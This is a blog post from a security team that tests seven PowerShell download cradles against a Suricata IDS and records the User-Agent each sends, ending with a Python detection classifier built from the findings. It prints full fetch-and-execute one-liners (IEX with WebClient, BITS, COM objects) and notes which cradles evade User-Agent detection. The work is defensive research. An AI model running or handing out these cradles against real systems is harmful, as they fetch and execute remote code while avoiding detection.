Pwntario Team Blog
Taking a Closer Look at PowerShell Download Cradles


Last updated 4 years ago


Intro

There was recently a Twitter discussion around PowerShell download cradles and the User-Agents they use, so I decided to take a look at them from the IDS side.

Methodology

I grabbed this list from @harmj0y's GitHub page and ran through all of them, hosting a benign PowerShell script on a local web server (192.168.1.116). I then used the awesome SELKS IDS distribution (Suricata) to look at the User-Agent each method sent when it fetched the script.

Findings

Each cradle was run against the same local web server, fetching hey.ps1, hey2.ps1 or hey.txt. The User-Agent is what SELKS recorded for that request.

  1. Net.WebClient
     Command: IEX (New-Object Net.Webclient).downloadstring("http://192.168.1.116/hey.ps1")
     User-Agent: No User-Agent header sent

  2. Invoke-WebRequest (iwr)
     Command: IEX (iwr 'http://192.168.1.116/hey.ps1')
     User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.483

  3. InternetExplorer.Application COM object
     Command: $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://192.168.1.116/hey.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
     User-Agent: N/A – couldn't get this one to work

  4. Msxml2.XMLHTTP COM object
     Command: $h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://192.168.1.116/hey.ps1',$false);$h.send();iex $h.responseText
     User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)

  5. WinHttp.WinHttpRequest COM object
     Command: $h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://192.168.1.116/hey.ps1',$false);$h.send();iex $h.responseText
     User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

  6. BITS (Start-BitsTransfer)
     Command: Import-Module bitstransfer;Start-BitsTransfer 'http://192.168.1.116/hey2.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r
     User-Agent: Microsoft BITS/7.8

  7. System.Xml.XmlDocument (the fetched file is an XML document; the script sits in its command/a/execute element)
     Command: $a = New-Object System.Xml.XmlDocument; $a.Load("http://192.168.1.116/hey.txt"); $a.command.a.execute | iex
     User-Agent: No User-Agent header sent

Fairly interesting findings. I'm not sure this was an exhaustive list of cradles; if anyone has more they'd like tested, just message me on Twitter @Antonlovesdnb.

Notes

  • From a stealth point of view, at least when looking only at User-Agents, the first and last methods on the chart (Net.WebClient and System.Xml.XmlDocument) seem the most stealthy, since neither sends a User-Agent header at all. The BITS method is interesting as well: depending on the organization's traffic profile, "Microsoft BITS/7.8" might be very common and blend in.

  • I ran these tests on a Windows 10 host with the latest updates and PowerShell v5. $PSVersionTable.PSVersion reported the following, which matches the version string embedded in the Invoke-WebRequest User-Agent above:

    Major  Minor  Build  Revision
    5      1      15063  483

  • I was kind of hoping that each method would leave a unique User-Agent that I could build some kind of IDS alert around, but this doesn't seem to be the case: two methods send no User-Agent at all, and the others send strings that are not exclusive to PowerShell. Your best bet for identifying malicious activity of this sort is PowerShell logging + Sysmon.

Hope this was helpful.
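As an added example (not code from the original post, SELKS or Suricata), here is a small Python classifier that applies the findings table to Suricata eve.json http records: it maps each observed User-Agent back to the cradle(s) that could have produced it, treats a missing User-Agent as "either Net.WebClient or XmlDocument", and raises confidence one step when the fetched path looks like a script. The eve.json records, the script-like extension list and the confidence levels are constructed for this example; the field names (`event_type`, `src_ip`, `http.hostname`, `http.url`, `http.http_user_agent`) follow Suricata's eve http schema, and it is assumed that Suricata omits `http_user_agent` when the client sent no header.

```python
"""Classify PowerShell download-cradle candidates from Suricata eve.json http events.

Added example for the findings above; the sample records are constructed, not captured.
"""
import json
import re

# Fingerprints lifted from the findings table: the User-Agent each cradle produced
# when Suricata watched the fetch. Most specific first.
UA_FINGERPRINTS = [
    # Unique to PowerShell's Invoke-WebRequest; the PS version is embedded.
    ("Invoke-WebRequest (iwr)", re.compile(r"WindowsPowerShell/[\d.]+"), "high"),
    # Default UA of the WinHTTP COM object used from scripts.
    ("WinHttp.WinHttpRequest.5.1 COM", re.compile(r"WinHttp\.WinHttpRequest"), "high"),
    # BITS is often legitimate (Windows Update etc.), so low on its own.
    ("Start-BitsTransfer", re.compile(r"^Microsoft BITS/"), "low"),
    # Generic IE/urlmon compatibility string shared by Msxml2.XMLHTTP and many
    # other Windows components, so a weak indicator by itself.
    ("Msxml2.XMLHTTP COM", re.compile(r"^Mozilla/4\.0 \(compatible; MSIE 7\.0;.*Trident/7\.0"), "low"),
]

# Cradles that sent no User-Agent at all; the IDS cannot tell these two apart.
NO_UA_CRADLES = ("Net.WebClient.DownloadString", "System.Xml.XmlDocument.Load")

# Assumption for this example: these extensions count as "script-like" and raise
# confidence one step (the post fetched .ps1 and .txt payloads).
SCRIPT_LIKE = re.compile(r"\.(ps1|psm1|txt|xml)(\?.*)?$", re.IGNORECASE)

LEVELS = ["info", "low", "medium", "high"]


def bump(level, steps=1):
    """Raise a confidence level by `steps`, capped at 'high'."""
    return LEVELS[min(LEVELS.index(level) + steps, len(LEVELS) - 1)]


def classify_user_agent(ua):
    """Return (candidate cradles, base confidence) for a raw User-Agent value."""
    if not ua:
        # No header at all: both no-UA cradles are possible. Medium, because a
        # browser or most legitimate software would have sent something.
        return list(NO_UA_CRADLES), "medium"
    for name, pattern, level in UA_FINGERPRINTS:
        if pattern.search(ua):
            return [name], level
    return [], "info"


def classify_http_event(event):
    """Classify one eve.json record; None for non-http events or nothing cradle-like."""
    if event.get("event_type") != "http":
        return None
    http = event.get("http", {})
    ua = http.get("http_user_agent")  # absent key == client sent no header
    candidates, level = classify_user_agent(ua)
    if not candidates:
        return None
    url = http.get("url", "")
    if SCRIPT_LIKE.search(url):
        level = bump(level)
    return {
        "src_ip": event.get("src_ip"),
        "dest": f"{http.get('hostname', '')}{url}",
        "user_agent": ua or "<none>",
        "candidates": candidates,
        "confidence": level,
    }


def scan_eve_lines(lines):
    """Run the classifier over eve.json lines (one JSON object per line)."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        hit = classify_http_event(json.loads(line))
        if hit:
            hits.append(hit)
    return hits


# Constructed eve.json records mirroring the table (rows 1, 2, 4, 5, 6, 7), plus a
# legitimate-looking BITS fetch, a browser request and a non-http event.
SAMPLE_EVE = """
{"event_type":"http","src_ip":"192.168.1.50","http":{"hostname":"192.168.1.116","url":"/hey.ps1","http_method":"GET"}}
{"event_type":"http","src_ip":"192.168.1.50","http":{"hostname":"192.168.1.116","url":"/hey.ps1","http_user_agent":"Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.15063.483"}}
{"event_type":"http","src_ip":"192.168.1.50","http":{"hostname":"192.168.1.116","url":"/hey.ps1","http_user_agent":"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E)"}}
{"event_type":"http","src_ip":"192.168.1.50","http":{"hostname":"192.168.1.116","url":"/hey.ps1","http_user_agent":"Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"}}
{"event_type":"http","src_ip":"192.168.1.50","http":{"hostname":"192.168.1.116","url":"/hey2.ps1","http_user_agent":"Microsoft BITS/7.8"}}
{"event_type":"http","src_ip":"192.168.1.50","http":{"hostname":"192.168.1.116","url":"/hey.txt"}}
{"event_type":"http","src_ip":"192.168.1.51","http":{"hostname":"download.windowsupdate.com","url":"/d/msdownload/update.cab","http_user_agent":"Microsoft BITS/7.8"}}
{"event_type":"http","src_ip":"192.168.1.52","http":{"hostname":"example.com","url":"/","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/68.0"}}
{"event_type":"alert","src_ip":"192.168.1.52","alert":{"signature":"unrelated"}}
"""

if __name__ == "__main__":
    for hit in scan_eve_lines(SAMPLE_EVE.splitlines()):
        print(f"{hit['confidence']:6} {hit['src_ip']:14} {hit['dest']:42} "
              f"{hit['candidates']} UA={hit['user_agent']}")
```

Run it over a real eve.json with `scan_eve_lines(open("/var/log/suricata/eve.json"))`. The output makes the post's point concrete: the two no-UA cradles land in the same bucket, the BITS and MSIE 7.0 strings only become interesting once the fetched path looks like a script, and only the Invoke-WebRequest and WinHttpRequest strings stand on their own, which is why the classifier is a triage aid for the IDS side and PowerShell logging + Sysmon remain the primary detection.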